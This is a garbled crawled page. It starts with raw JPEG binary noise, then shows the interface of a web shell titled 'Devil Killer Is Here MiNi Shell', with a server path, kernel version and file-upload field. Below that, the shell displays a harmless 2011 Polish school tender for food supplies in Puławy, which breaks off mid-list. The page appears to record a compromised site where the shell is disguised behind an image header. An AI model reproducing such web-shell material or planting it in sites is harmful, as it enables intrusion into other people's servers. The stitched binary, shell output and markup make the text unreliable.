JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111227/437924-N-2011.html

<p class="kh_header"><b>Puławy: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 437924 - 2011; data zamieszczenia: 27.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 10 im. Adama Mickiewicza , ul. 6-go Sierpnia 30, 24-100 Puławy, woj. lubelskie, tel. 081 8878300, faks 081 8873115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp10.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 15.10.00.00 produkty zwierzęce, mięso i produkty mięsne	         
 NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto	
           Schab wieprzowy b kości	kg	308			
           Łopatka wieprzowa b kości	kg	364		
	Wołowina b kości	kg	480		
	Karczek  wieprzowy  b kości	kg	340		
	Kości wieprzowe schabowe	kg	446		
	Słonina b s	kg	151		
	Kiełbasa zwyczajna	kg	300		
	Kiełbasa żywiecka	kg	120		
	Parówki	kg	75		
	Szynka	kg	8		
	Baleron	kg	8		
 	 Pasztet Mazowiecki	460 g	30		

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Kurczak świeży	kg	183		
	Piersi kurczaka	kg	270		
	Udka drobiowe świeże	kg	830		

Wymagana jakość mięsa - świeże, barwa jasnoróżowa, świeży zapach.
Wymagana jakość wędlin - w osłonkach białkowych o barwie jasnobrązowej lub polietylenowych, przeźroczystych; osłony ściśle przylegające do farszu o czystej i suchej powierzchni; w przekroju masa mięsna o jasnoróżowej barwie i charakterystycznym zapachu dla danego asortymentu.

	15.80.00.00 różne produkty spożywcze

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Cukier 	kg	675		
	Cukier waniliowy 	op.32g	70		
	Drożdże 	kg	2		
	Kwasek cytrynowy 	op. 50g	108		
	Liście laurowe 	op. 6g	113		
	Przyprawa do zup w płynie	L.	190		
	Majeranek 	op. 8g	104		
	Pieprz mielony 	op. 20g	297		
	Sól 	kg	332		
	Sos w proszku  - sałatkowy	op. 800g	8		
	Ziele angielskie 	op. 15g	115		
	Chrzan w słoiku	280g	70		
	Dżem 	280 g	200		
	Groszek konserwowy 	400 ml	130		
	Koncentrat pomidorowy 	L.	120		
	Kukurydza konserwowa 	425 ml	124		
	Ketchup 	500 g	132		
	Majonez  	250 ml.	90		
	Musztarda 	180g	60		
	Sos  w proszku  boloński	op. 1kg	18		
	Jarzynowa przyprawa w proszku do potraw	op. 75g	275		
	Cynamon	op. 20g	5		
	Kisiel	38 g	5		
	Nutella	385 g	35		
	Miód	280 g	5		
	Kakao	300g	15		
 	Herbata ekspresowa	op 100szt	8		  
	Płatki śniadaniowe cynamonowe	0,5 kg	25		
	Płatki śniadaniowe czekoladowe kulki	0,5 kg	25		
	Płatki śniadaniowe czekoladowe muszelki	0,5 kg	25		
	Płatki śniadaniowe czekoladowe miodowe	0,5 kg	25		













15.30.00.00  owoce, warzywa i podobne produkty


	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
MROŻONKI
	Mieszanki wielowarzywne	450 g	178		
	Kalafior	450 g	46		
	Fasolka szparagowa	kg	24		
	Truskawki mrożone	kg	260		
	Brokuły	kg	20		
KISZONKI
	Kapusta kwaszona	kg.	690		
	Ogórki kiszone	kg	260		
WARZYWA ŚWIEŻE
	Buraki czerwone	kg	485		
	Cebula	kg	490		
	Czosnek  główki szt.	300		
	Fasola Jaś	kg	300		
	Jabłka	kg	450		
	Kapusta biała	kg	400		
	Kapusta czerwona	kg	250		
	Kalafior świeży	szt.	40		
	Marchew	kg	1646		
	Pietruszka	kg	198		
	Seler	kg	261		
	Por	kg	288		
	Ziemniaki	kg	13 660		
	Papryka	kg	15		
	Sałata	szt.	658		
	Kapusta pekińska	kg	180		
	Ogórki świeże	kg	300		
	Kapusta młoda	szt.	250		
	Koper  liście świeże	pęczek	137		
	Natka pietruszki	pęczek	146		
	Truskawki świeże 	łubianka	30		
	Pieczarki	kg	113		
	Szczypior	pęczek	100		
	Rzodkiewka 	pęczek	100		
	Cytryna	kg	10		
	Pomidor	kg	30		
	Brokuł	szt.	50		
	Mandarynki	kg	35		
	Banany	kg	35		
	Gruszki	kg	35		
	Nektarynki	kg	15		
INNE PRODUKTY OWOCOWE  WARZYWNE
	Groch łupany 	kg	110		
	Syropy owocowe 	0,5 l.	1200		
	Ogórki konserwowe	910 g	360		
	Szczaw	280 g	100		
	Soczki owocowe	200 ml	250		

15.50.00.00 produkty mleczarskie 

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Ser biały tłusty	kg	260		
	Mleko  2%	L.	570		
	Śmietana  22%	L.	354		
	Śmietana 18%	0,5 op	1314		
	Masło	200g	40		
	Ser żółty plastry	150 g	40		
	Serek topiony bloczek	150 g	80		
	Serek Bieluch	150g	140		
	Masło roślinne	500g	110		
 	Jogurty Joguś	150 g	485		


	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Jaja świeże	szt.	5700		



15.40.00.00  oleje i tłuszcze zwierzęce lub roślinne
	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Olej roślinny	L.	630		

15.60.00.00 produkty przemiału ziarna, skrobi i produktów skrobiowych 

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Makaron świderki 	 0,5 kg	916		
	Makaron kokardki 	kg	84		
	Makaron łazanki 	kg.	100		
	Makaron krajanka 	250 g	178		
	Ryż 	kg.	396		
	Kasza jęczmienna  	 0,5kg.	590		
	Kasza gryczana 	kg.	20		
	Pyzy mrożone ziemniaczane	 450g.	700		
	Kasza manna	kg.	3		
	Mąka pszenna	kg.	710		
	Chleb krojony  standard.	szt.	25 000		
	Bułka Wrocławska krojona	szt.	650		
	Makaron spaghetti	kg	120		
	Bułka tarta	kg.	85		
	Bułka mała  suszona	szt.	700		
	Kopytka świeże	kg	116		
	Pierogi ruskie świeże	kg	590		


15.20.00.00  ryby 

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Dorsz mrożony półtusze	kg	370		
	Makrela wędzona	kg	12.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>w zależności od potrzeb Zamawiającego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich
3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie -  2 dostawy o wartości nie mniejszej niż  50.000 zł. brutto  - usługi polegające  na dostawie produktów zawartych w jednej z części przetargu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
1) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 50.000,00 zł,
2) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp10.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> agnieszkapiasecka80@o2.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2012 godzina 10:00, miejsce: Szkoła Podstawowa nr 01 w Puławach 
ul. 6-go Sierpnia 30 
24-100 Puławy
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 15.10.00.00 - produkty zwierzęce, mięso i produkty mięsne

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Schab wieprzowy bkości	kg	308		
	Łopatka wieprzowa bkości	kg	364		
	Wołowina b/kości	kg	480		
	Karczek  wieprzowy  bkości	kg	340		
	Kości wieprzowe schabowe	kg	446		
	Słonina bs	kg	151		
	Kiełbasa zwyczajna	kg	300		
	Kiełbasa żywiecka	kg	120		
	Parówki	kg	75		
	Szynka	kg	8		
	Baleron	kg	8		
 	 Pasztet Mazowiecki	460 g	30		

	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Kurczak świeży	kg	183		
	Piersi kurczaka	kg	270		
	Udka drobiowe świeże	kg	830.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dorsz mrożony półtusze	kg	370		
	Makrela wędzona	kg	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanki wielowarzywne	450 g	178		
	Kalafior	450 g	46		
	Fasolka szparagowa	kg	24		
	Truskawki mrożone	kg	260		
	Brokuły	kg	20		
KISZONKI
	Kapusta kwaszona	kg.	690		
	Ogórki kiszone	kg	260		
WARZYWA ŚWIEŻE
	Buraki czerwone	kg	485		
	Cebula	kg	490		
	Czosnek główki szt.	300		
	Fasola Jaś	kg	300		
	Jabłka	kg	450		
	Kapusta biała	kg	400		
	Kapusta czerwona	kg	250		
	Kalafior świeży	szt.	40		
	Marchew	kg	1646		
	Pietruszka	kg	198		
	Seler	kg	261		
	Por	kg	288		
	Ziemniaki	kg	13 660		
	Papryka	kg	15		
	Sałata	szt.	658		
	Kapusta pekińska	kg	180		
	Ogórki świeże	kg	300		
	Kapusta młoda	szt.	250		
	Koper - liście świeże	pęczek	137		
	Natka pietruszki	pęczek	146		
	Truskawki świeże 	łubianka	30		
	Pieczarki	kg	113		
	Szczypior	pęczek	100		
	Rzodkiewka 	pęczek	100		
	Cytryna	kg	10		
	Pomidor	kg	30		
	Brokuł	szt.	50		
	Mandarynki	kg	35		
	Banany	kg	35		
	Gruszki	kg	35		
	Nektarynki	kg	15		
INNE PRODUKTY OWOCOWE  WARZYWNE
	Groch łupany 	kg	110		
	Syropy owocowe 	0,5 l.	1200		
	Ogórki konserwowe	910 g	360		
	Szczaw	280 g	100		
	Soczki owocowe	200 ml	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> oleje i tłuszcze zwierzęce lub roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej roślinny	L.	630.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ser biały tłusty	kg	260		
	Mleko  2%	L.	570		
	Śmietana  22%	L.	354		
	Śmietana 18%	0,5 op	1314		
	Masło	200g	40		
	Ser żółty plastry	150 g	40		
	Serek topiony bloczek	150 g	80		
	Serek Bieluch	150g	140		
	Masło roślinne	500g	110		
	Jogurty Joguś	150 g	485		


	NAZWA	j.m.	Ilość	cena jednostkowa	wartość brutto
	Jaja świeże	szt.	5700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Makaron świderki 	 0,5 kg	916		
	Makaron kokardki 	kg	84		
	Makaron łazanki 	kg.	100		
	Makaron krajanka 	250 g	178		
	Ryż 	kg.	396		
	Kasza jęczmienna  	 0,5kg.	590		
	Kasza gryczana 	kg.	20		
	Pyzy mrożone ziemniaczane	 450g.	700		
	Kasza manna	kg.	3		
	Mąka pszenna	kg.	710		
	Chleb krojony - standard.	szt.	25 000		
